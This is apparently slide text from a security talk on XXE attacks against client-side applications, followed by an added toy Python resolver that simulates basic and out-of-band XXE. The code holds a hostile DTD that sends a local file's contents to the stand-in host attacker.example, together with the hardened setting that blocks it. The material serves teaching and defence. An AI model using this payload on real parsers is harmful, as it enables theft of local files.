2. Possible Hacktivity topics
How secure are today’s games?
Possible vulns in the EventLog subsystem of recent Windows systems.
The security of smart houses.
4. Well known XML attacks
XSLT-related
XInclude attacks
Entity-based attacks
• Billion laughs
• XXE
Everybody should read “XML Schema, DTD, and Entity Attacks” by VSR
5. DON'Ts
Lots of XML-related web application attacks.
But the web is not the whole world. (not yet, anyway :) )
Won't show any new XML vulnerabilities.
6. DOs
Show exciting ways to exploit
Deal with the client side
Deal with XML derivatives and files with embedded XML parts
There are tons of these.
Often people don't even realize they are dealing with XML
Some examples: X3D, CML, BeerXML, GPX, OpenDocument, EPUB, you name it.
7. XML entities
What are “entities” in XML-world?
OK, what are “external entities”?
http://www.w3.org/TR/2006/REC-xml11-20060816/#sec-entity-decl
8. XXE Intro
Most basic XXE: include resources
App has to display something from the XML
12. Parameter entities
Special type of entity: referenced with % instead of &
More flexible
• Can pull in an external DTD
• Can only be referenced inside the DTD, not in the XML body
• Replacement text does not have to be XML, it only has to conform to DTD syntax
16. Sending local file content
External parameter entity
Different protocol handlers: FTP, HTTP, FILE
Differences in implementation
Out-of-Band (OOB)
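As an added example (not code from the talk), a toy entity resolver in Python that covers slides 7, 8, 12 and 16 in one place: general vs. parameter entities, an external entity reading a local file, the out-of-band parameter-entity chain through an external DTD, and the two defensive knobs a real parser exposes (no external resolution, an expansion counter). It is not a real XML parser; attacker.example, the evil.dtd body, the secret file and the in-memory HTTP "server" are all constructed for the demo, and file:// URLs assume POSIX paths.

```python
# Toy DTD/entity resolver: added example, not a real parser; assumes POSIX paths.
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

DOCTYPE_RE = re.compile(r"<!DOCTYPE\s+\w+\s*\[(.*?)\]\s*>", re.S)
ENTITY_RE = re.compile(
    r"""<!ENTITY\s+(%\s+)?(\w+)\s+(?:(["'])(.*?)\3|SYSTEM\s+(["'])(.*?)\5)\s*>""", re.S)
CHARREF_RE = re.compile(r"&#x([0-9a-fA-F]+);")   # &#x25; is how a DTD smuggles in a "%"

class XxeError(Exception):
    pass

class ToyXmlParser:
    def __init__(self, handlers, allow_external=True, max_expansions=1000):
        self.handlers = handlers        # URL scheme -> callable(url) -> text
        self.allow_external = allow_external
        self.max_expansions = max_expansions
        self.general = {}               # &name; -> ("internal", text) | ("external", url)
        self.parameter = {}             # %name; -> same, but only usable inside the DTD
        self.expansions = 0
        self.requests = []              # every URL fetched: what the attacker's server logs

    def fetch(self, url):
        if not self.allow_external:     # the hardened setting: no resolver, no XXE
            raise XxeError("external entity blocked: " + url)
        self.requests.append(url)
        return self.handlers[urlparse(url).scheme](url)

    def value_of(self, table, name):
        self.expansions += 1            # crude billion-laughs guard
        if name not in table or self.expansions > self.max_expansions:
            raise XxeError(f"undeclared entity or expansion limit: {name}")
        kind, payload = table[name]
        return self.fetch(payload) if kind == "external" else payload

    def expand(self, text, table, marker):   # &name; in the body, %name; in DTD text
        return re.sub(re.escape(marker) + r"(\w+);", lambda m: self.expand(
            self.value_of(table, m.group(1)), table, marker), text)

    def load_dtd(self, rest):
        while rest.strip():
            rest = rest.lstrip()
            pe = re.match(r"%(\w+);", rest)
            if pe:  # declaration-level %ref;: its replacement text is parsed as more DTD
                rest = self.value_of(self.parameter, pe.group(1)) + rest[pe.end():]
                continue
            decl = ENTITY_RE.match(rest)
            if decl:
                is_pe, name, literal, url = decl.group(1, 2, 4, 6)
                table = self.parameter if is_pe else self.general
                if url is None:   # char refs and %refs; in a literal are resolved right here
                    literal = CHARREF_RE.sub(lambda m: chr(int(m.group(1), 16)), literal)
                    table.setdefault(name, ("internal", self.expand(literal, self.parameter, "%")))
                else:
                    table.setdefault(name, ("external", url))   # first declaration wins
                rest = rest[decl.end():]
                continue
            rest = rest[rest.find(">") + 1:] if ">" in rest else ""   # skip anything else

    def parse(self, xml):
        m = DOCTYPE_RE.search(xml)
        if m:
            self.load_dtd(m.group(1))
        return self.expand(DOCTYPE_RE.sub("", xml, count=1), self.general, "&")

def file_handler(url):
    return Path(urlparse(url).path).read_text()

def write_secret():
    path = Path(tempfile.gettempdir()) / "toy_xxe_secret.txt"
    path.write_text("s3cr3t-token-42")  # constructed; one line, libxml2 rejects newlines in URIs
    return path

def demo_basic_xxe(allow_external=True):
    """Slide 8: the app echoes &xxe;, so the file content lands in the output."""
    doc = f'<!DOCTYPE r [<!ENTITY xxe SYSTEM "file://{write_secret()}">]><r>&xxe;</r>'
    try:
        return ToyXmlParser({"file": file_handler}, allow_external).parse(doc)
    except XxeError as e:               # allow_external=False: the hardened parser refuses
        return str(e)

# The classic OOB chain, served by a simulated (hypothetical) attacker.example web server.
EVIL_DTD = ('<!ENTITY % all "<!ENTITY &#x25; send SYSTEM '
            "'http://attacker.example/?%file;'>\">%all;")

def demo_oob_parameter_entity():
    """Slides 12/16: nothing is displayed, yet the file content leaves inside a URL."""
    server = {"http://attacker.example/evil.dtd": EVIL_DTD}
    p = ToyXmlParser({"file": file_handler, "http": lambda url: server.get(url, "")})
    p.parse(f'<!DOCTYPE r [<!ENTITY % file SYSTEM "file://{write_secret()}">'
            '<!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd"> %dtd; %send; ]>'
            '<r>boring</r>')
    return p.requests
```

`demo_oob_parameter_entity()` returns the three URLs the parser fetched; the last one carries the secret, and the document body never showed it. Real parsers add the restrictions the later slides describe: because libxml2 refuses a URI containing a newline, a multi-line file breaks the `send` URL and nothing leaves. The defence that does not depend on such accidents is the `allow_external=False` path, i.e. refusing to resolve SYSTEM identifiers at all (lxml's `resolve_entities=False`, libxml2's `XML_PARSE_NONET` for the network half).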
21. XXE meets inter-protocol exploitation
Requirements
• Encapsulation
• Error tolerance
Main difficulty: limited character set
Let's check some XML parsers' badchars
Internet Explorer
• only ASCII
• URL-encodes some chars (e.g. space -> %20)
• Cuts newlines
Visual Studio
• URL-encodes every non-alphanumeric char
37. Garmin Training Center
+ Not bothered by newlines (\n)
- Yet not able to evaluate &variables;
Possible implementation issue
Visual Studio 2012
+ Able to evaluate &variables;
- A great fan of URL encoding
Permanent fail?
38. Slight possibility of using Garmin
I believe I saw it working
Finding another application that tolerates \n
Visual Studio can be "controlled"
Sending multiple files
Delivering more attacks
Not at all
39. XXE the AV!
Original idea: .docx vs. virus scanners
Grepped ClamAV's source for "xml"
It uses libxml2 to open XAR archives
basically an archive format with compressed XML metadata
What other AVs know this format?
49. &Some haxx0r stuff;
libxml2 limitation: very strict URI checking
• for example, no newlines allowed
OOB attacks are very limited
• only files without newlines can be stolen
SSRF is our Super Mushroom
• only GET requests
• only HTTP
• payload cannot contain non-ASCII chars
58. Further research
Games that use XML for game saves, network communication
• Skyrim
• FlightGear
XML metadata
• RDF
Binary XML parsers
• Cwxml
• OpenEXI
• EXIficient
• AgileDelta
• Windows EventLog format (since Vista)
Network Configuration Protocol (NETCONF)
XML databases
• IBM DB2
• Oracle
• MSSQL